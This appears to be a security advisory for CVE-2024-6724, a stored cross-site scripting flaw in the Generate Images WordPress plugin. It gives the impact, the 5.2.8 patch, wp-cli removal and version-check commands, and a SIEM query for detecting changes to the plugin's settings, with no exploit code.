CVE-2024-6724
📋 TL;DR
The Generate Images WordPress plugin before version 5.2.8 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated administrators to inject malicious scripts that execute when other users view affected pages, even in WordPress multisite installations where unfiltered_html is restricted. Only WordPress sites using vulnerable versions of this specific plugin are affected.
💻 Affected Systems
- Generate Images WordPress Plugin
📦 What is this software?
Magic Post Thumbnail by Magic Post Thumbnail
⚠️ Risk & Real-World Impact
Worst Case
An attacker with admin privileges could inject persistent malicious scripts that steal session cookies, redirect users to phishing sites, or perform actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Malicious admin or compromised admin account injects scripts that affect other privileged users, potentially leading to privilege escalation or data theft within the WordPress environment.
If Mitigated
With proper access controls and admin account security, impact is limited to authorized administrators intentionally misusing their privileges.
🎯 Exploit Status
Exploitation requires administrative privileges. The vulnerability is in plugin settings that administrators can modify.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.2.8
Vendor Advisory: https://wpscan.com/vulnerability/0cb3158a-263d-4c4a-8029-62b453c281cb/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Generate Images' plugin. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 5.2.8+ from WordPress repository and manually update.
🔧 Temporary Workarounds
Remove vulnerable plugin
allTemporarily disable or remove the Generate Images plugin until patched version can be installed
wp plugin deactivate generate-images
wp plugin delete generate-images
Restrict admin access
allTemporarily restrict administrative access to only essential, trusted users
🧯 If You Can't Patch
- Implement strict access controls for WordPress admin accounts with multi-factor authentication
- Regularly audit admin user activity and plugin settings for unauthorized changes
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel → Plugins → Installed Plugins → Generate Images version. If version is below 5.2.8, system is vulnerable.Check Version:
wp plugin list --name=generate-images --field=versionVerify Fix Applied:
After updating, verify Generate Images plugin shows version 5.2.8 or higher in WordPress admin plugins list.📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to Generate Images plugin settings in WordPress logs
- Multiple admin login attempts or suspicious admin activity
Network Indicators:
- Unexpected JavaScript payloads in WordPress admin requests related to plugin settings
SIEM Query:
source="wordpress" AND (plugin="generate-images" AND (action="update" OR action="edit")) AND user_role="administrator"